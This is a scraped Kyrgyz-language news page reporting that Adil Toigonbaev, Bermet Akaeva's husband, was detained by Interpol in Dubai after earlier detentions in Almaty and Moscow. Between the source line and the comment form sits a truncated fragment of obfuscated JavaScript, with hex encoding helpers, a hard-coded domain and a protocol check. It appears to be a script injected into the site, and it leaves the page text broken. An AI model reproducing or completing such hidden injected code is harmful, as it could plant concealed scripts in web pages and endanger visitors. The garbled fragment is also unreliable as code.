Menu

Адил Тойгонбаев 3-жолу кармалды

Бөлүшүү:

Акаев бийлигин элге жаман көрсөткөн адамдардын бири, улуту казак, Бермет Акаеванын күйөөсү Адил Тойгонбаев Дубайдан кармалды. Аны эл аралык издөөдө жүргөнү үчүн интерпол кармады. Ал Кыргызстан тарабынан бир нече кылмышка жоопкерчилике тартуу үчүн изделип жаткан жана Интерполдун “кызыл тегерекче” деген тизмесине киргизилген экен.
Эсиңерде болсо Аскар Акаевдин заманында мамлекеттин тагдырын чечүүлүлөрдүн катарында болгон жана бир катар финансылык кылмыштарды жасаган деген айыптар коюлуп келет. Бирок, Тойгонбаев буга чейин эки жолу кармалып кайра бошотулган. Биринчисин, Алмата шаарынан 2013-жылы кармап кайра кое беришкен.

2014-жылы дагы Интерпол тарабынан Москвадан кармалып Казакстандын жараны болгондуктан Кыргызстанга өткөрүп берилбейт деген себеп менен кое беришкен. Бул жолу кайсыл мамлекеттин жараны экенине карабай алынып келинеби же жокбу белгисиз. Бириккен Арап Эмираттарынан кылмыш дүйнөсүнүн өкүлү деп эсептелинген, бир жыл мурун Минскде өлтүрүлгөн Алмамбет Анапияев да кармалып бирок бизге өткөрүлүп берилген эмес.

Адил Тойгонбаевдин Кыргызстанга алынып келип кылмыш жоопкерчилигине тартылышын көпчүлүк каалайт. Анткени, бир кезде Кыргызстандагы кадр, каржы саясаттарын каалаганындай калчап, мамлекеттин экономикалык, социалдык жактан артка кетишине себепчи болгон Адил Тойгонбаевдин оор жазасы азыркы көзүн май баскан айрым чиновниктерге сабак болсо деп ойлошот.

Булак: “Эгемен”

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Эгер бул тексттен ката таап калсаңыз, ошол ката сөздү белгилеп, Ctrl+Enter кнопкаларын чоогу басуу менен билдирип коюңуз.

КОММЕНТАРИЙ КАЛТЫРУУ

Төмөндө көрсөтүлгөн уячаларга керектүү маалыматтарды туура киргизгениңизди текшериңиз.HTML-код киргизүүгө уруксат жок.

Captcha 50 − = 41

ОКШОШ МАКАЛАЛАР

Меню

Орфографиялык ката тууралуу Отчет

Редакцияга төмөнкү текст жөнөтүлөт: